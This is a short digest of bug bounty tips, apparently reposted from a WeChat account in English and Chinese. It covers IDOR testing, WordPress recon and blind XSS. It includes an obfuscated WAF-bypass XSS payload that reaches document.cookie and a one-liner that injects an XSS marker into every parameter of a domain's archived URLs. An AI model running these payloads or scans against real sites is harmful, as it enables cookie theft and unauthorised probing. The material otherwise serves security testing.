When testing IDOR on a request that is supposed to alter something (PUT/DELETE/PATCH), receiving 403 Forbidden Access in response does not necessarily mean the endpoint is not vulnerable to IDOR. Always check the UI as well.
WPRecon, is a tool for the recognition of vulnerabilities and blackbox information for wordpress.
https://github.com/AngraTeam/wprecon
Hi Hunters! Here’s V1 0f My Recon Methodology , Enjoy
Perhaps the reason you are not finding vulns/bugs is either because your environment is not setup correctly or your methodology requires improvements. Here are a number of to help you with that
https://www.gnucitizen.org/blog/bug-bounty-tips/
Web application surface testing
File Upload Cheat Sheet
Sunday Funday waf bypass x3, happy hacking 🙂
"onx+%00+onpointerenter%3dalert(domain)+x"%2sscript%2ualert()%2s/script%2u“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
一行代码组成的XSS扫描器(适合无WAF场景)【单论反射XSS,XRAY可封神】
echo url | subfinder -silent | waybackurls | grep "=" | grep -Ev ".(jpeg|jpg|png|svg|gif|ico|js|css|txt|pdf|woff|woff2|eot|ttf|tif|tiff)" | sed -e 's/=[^?|&]*/=/g' -e 's/=/=xssspayload/g' | sort -u | httpx -silent -probe -ms "xsspayload" Tip: web app is using REST API? Look for information disclosure.
I inserted a blind xss payload a few months ago and it was triggered just a few days ago XSS via product name field triggered when the admin website wanted to delete it.
一句话翻译:盲打的XSS,永不放弃!
计划修改更新频率:周一到周五。周末的可能会直接发群里,不单独发文。
原文始发于微信公众号(Bug Bounty Tips):Bug Bounty Tips(2022-10-16)
